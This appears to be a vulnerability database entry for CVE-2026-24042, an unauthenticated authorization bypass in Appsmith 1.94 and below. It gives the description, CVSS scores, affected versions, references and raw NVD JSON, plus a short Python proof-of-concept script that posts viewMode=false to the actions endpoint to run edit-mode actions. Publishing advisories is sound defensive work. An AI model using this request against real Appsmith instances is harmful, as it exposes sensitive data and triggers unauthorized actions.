CVE-2026-24042

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* - VULNERABLE

Appsmith <= 1.94

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# 目标Appsmith实例
target_url = "http://target-appsmith.com/api/v1/actions/execute"

# 构造恶意请求，绕过viewMode检查
payload = {
    "actionId": "<action_id>",
    "viewMode": False  # 关键：设置为False以访问编辑模式
}

headers = {
    "Content-Type": "application/json"
}

# 发送未授权请求
response = requests.post(target_url, json=payload, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24042
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24042
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24042/
[4] VulDB https://vuldb.com/cve/CVE-2026-24042
[5] https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24042", "sourceIdentifier": "[email protected]", "published": "2026-01-22T04:16:00.187", "lastModified": "2026-02-17T17:50:44.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication."}, {"lang": "es", "value": "Appsmith es una plataforma para construir paneles de administración, herramientas internas y paneles de control. En las versiones 1.94 e inferiores, las aplicaciones de acceso público permiten a usuarios no autenticados ejecutar acciones no publicadas (en modo edición) enviando viewMode=false (o omitiéndolo) a POST /API/v1/actions/execute. Esto elude el límite de publicación esperado donde los espectadores públicos solo deberían ejecutar acciones publicadas, no versiones en modo edición. Un ataque puede resultar en exposición de datos sensibles, ejecución de consultas y API en modo edición, acceso a datos de desarrollo y la capacidad de desencadenar comportamientos con efectos secundarios. Este problema no tiene una solución publicada en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.94", "matchCriteriaId": "E0D385D9-E0EC-4CED-AB28-87B2CD03C5E8"}]}]}], "references": [{"url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}